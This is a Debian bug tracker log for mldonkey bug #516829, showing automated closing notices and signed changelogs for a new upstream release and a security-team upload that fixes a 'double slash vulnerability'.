Date: Mon, 16 Mar 2009 14:42:20 +0100

Nico Golde wrote:
> Hi,
> this bug was marked as pending on February 24th. What is 
> missing for the upload? Do you need an NMU?
> 

We were fixing other bugs. It will be uploaded ASAP (tonight...).

Cheers,

-- 
Mehdi Dogguy مهدي الدقي
http://www.pps.jussieu.fr/~dogguy
Tel.: (+33).1.44.27.28.38




Reply sent to Samuel Mimram <smimram@debian.org>:
You have taken responsibility. (Mon, 16 Mar 2009 19:39:21 GMT) Full text and rfc822 format available.

Notification sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Bug acknowledged by developer. (Mon, 16 Mar 2009 19:39:21 GMT) Full text and rfc822 format available.

Message #44 received at 516829-close@bugs.debian.org (full text, mbox):

From: Samuel Mimram <smimram@debian.org>
To: 516829-close@bugs.debian.org
Subject: Bug#516829: fixed in mldonkey 3.0.0-1
Date: Mon, 16 Mar 2009 19:32:31 +0000
Source: mldonkey
Source-Version: 3.0.0-1

We believe that the bug you reported is fixed in the latest version of
mldonkey, which is due to be installed in the Debian FTP archive:

mldonkey-gui_3.0.0-1_i386.deb
  to pool/main/m/mldonkey/mldonkey-gui_3.0.0-1_i386.deb
mldonkey-server_3.0.0-1_i386.deb
  to pool/main/m/mldonkey/mldonkey-server_3.0.0-1_i386.deb
mldonkey_3.0.0-1.diff.gz
  to pool/main/m/mldonkey/mldonkey_3.0.0-1.diff.gz
mldonkey_3.0.0-1.dsc
  to pool/main/m/mldonkey/mldonkey_3.0.0-1.dsc
mldonkey_3.0.0.orig.tar.gz
  to pool/main/m/mldonkey/mldonkey_3.0.0.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 516829@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Samuel Mimram <smimram@debian.org> (supplier of updated mldonkey package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Mon, 16 Mar 2009 20:11:12 +0100
Source: mldonkey
Binary: mldonkey-server mldonkey-gui
Architecture: source i386
Version: 3.0.0-1
Distribution: unstable
Urgency: low
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Changed-By: Samuel Mimram <smimram@debian.org>
Description: 
 mldonkey-gui - Graphical frontend for mldonkey based on GTK+
 mldonkey-server - Door to the 'donkey' network
Closes: 204266 332324 432205 484674 487803 508280 508436 508533 508538 509001 513369 514449 516829 517996
Changes: 
 mldonkey (3.0.0-1) unstable; urgency=low
 .
   [ Sylvain Le Gall ]
   * Remove useless explanation in chroot section of README.Debian.
   * Add debian/gbp.conf to force using pristine-tar
 .
   [ Stephane Glondu ]
   * Switch packaging to git.
 .
   [ Samuel Mimram ]
   * New upstream release, closes: #508280.
   * Fixes alignment problem on ARM, closes: #487803.
   * Remove useless line in init script, closes: #509001.
   * Better handling of errors in init script, closes: #508538.
   * Pass --debconf-ok option to ucf, closes: #514449.
   * Mention default telnet port in README.Debian, closes: #508436.
   * Updated Vietnamese debconf translation, closes: #513369.
   * Update standards version to 3.8.1.
   * Don't uselessly build-depend on dpkg-dev.
   * Version reference to GPL in copyright.
 .
   [ Mehdi Dogguy ]
   * New upstream release, closes: #516829.
   * Bump standards version to 3.8.0, no changes needed.
   * Fix Lintian warning concerning debian/mldonkey-server.postinst: do not
     specify full path of used commands.
   * Add ${misc:Depends} as a dependency for mldonkey-gui.
   * Add myself to uploaders.
   * Add DMUA flag (with Sam's blessing)
   * Add Homepage field
   * Use ocamlbuild to build utils
   * Add msse2 flag for i386 architecture
   * Simplify debian/rules
   * Create a manpage for mldonkey (link to mlnet's manpage for the moment)
   * Drop chrooted-mlnet support and do not suggest makejail anymore,
     closes: #204266.
   * Update/install NEWS.Debian and mention (again) removal of mldonkey_server
     (already mentioned in this changelog, entries 2.8.1-3, 2.8.3-2 and
     2.8.5-2), closes: #517996.
   * Add missing build-dependency libbz2-dev to enable Directconnect protocol.
   * Move mldonkey_{files,options,command,submit} to /usr/lib/mldonkey.
     Closes: #484674
   * Move the daemon's log in /var/log/mldonkey, closes: #508533.
   * Add debian/xml-man/generate-man to automatically generate manpages from
     help output, closes: #432205.
   * Remove some debconf questions, closes: #332324.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

-----END PGP SIGNATURE-----





Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. (Wed, 25 Mar 2009 14:12:04 GMT)

Notification sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Bug acknowledged by developer. (Wed, 25 Mar 2009 14:12:04 GMT)

Message #49 received at 516829-close@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: 516829-close@bugs.debian.org
Subject: Bug#516829: fixed in mldonkey 2.9.5-2+lenny1
Date: Wed, 25 Mar 2009 13:53:37 +0000
Source: mldonkey
Source-Version: 2.9.5-2+lenny1

We believe that the bug you reported is fixed in the latest version of
mldonkey, which is due to be installed in the Debian FTP archive:

mldonkey-gui_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-gui_2.9.5-2+lenny1_amd64.deb
mldonkey-server_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-server_2.9.5-2+lenny1_amd64.deb
mldonkey_2.9.5-2+lenny1.diff.gz
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.diff.gz
mldonkey_2.9.5-2+lenny1.dsc
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 516829@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated mldonkey package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 12 Mar 2009 21:26:26 +0100
Source: mldonkey
Binary: mldonkey-server mldonkey-gui
Architecture: source amd64
Version: 2.9.5-2+lenny1
Distribution: stable-security
Urgency: high
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 mldonkey-gui - Graphical frontend for mldonkey based on GTK+
 mldonkey-server - Door to the 'donkey' network
Closes: 516829
Changes: 
 mldonkey (2.9.5-2+lenny1) stable-security; urgency=high
 .
   * Non-maintainer upload by the security team
   * Add url.dpatch: Fix double slash vulnerability, closes: #516829.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

-----END PGP SIGNATURE-----





Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. (Sat, 11 Apr 2009 17:39:13 GMT)

Notification sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Bug acknowledged by developer. (Sat, 11 Apr 2009 17:39:13 GMT)

Message #54 received at 516829-close@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: 516829-close@bugs.debian.org
Subject: Bug#516829: fixed in mldonkey 2.9.5-2+lenny1
Date: Sat, 11 Apr 2009 16:47:31 +0000
Source: mldonkey
Source-Version: 2.9.5-2+lenny1

We believe that the bug you reported is fixed in the latest version of
mldonkey, which is due to be installed in the Debian FTP archive:

mldonkey-gui_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-gui_2.9.5-2+lenny1_amd64.deb
mldonkey-server_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-server_2.9.5-2+lenny1_amd64.deb
mldonkey_2.9.5-2+lenny1.diff.gz
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.diff.gz
mldonkey_2.9.5-2+lenny1.dsc
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 516829@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated mldonkey package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 12 Mar 2009 21:26:26 +0100
Source: mldonkey
Binary: mldonkey-server mldonkey-gui
Architecture: source amd64
Version: 2.9.5-2+lenny1
Distribution: stable-security
Urgency: high
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 mldonkey-gui - Graphical frontend for mldonkey based on GTK+
 mldonkey-server - Door to the 'donkey' network
Closes: 516829
Changes: 
 mldonkey (2.9.5-2+lenny1) stable-security; urgency=high
 .
   * Non-maintainer upload by the security team
   * Add url.dpatch: Fix double slash vulnerability, closes: #516829.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 10 May 2009 07:28:19 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 20:06:07 2014; Machine Name: buxtehude.debian.org
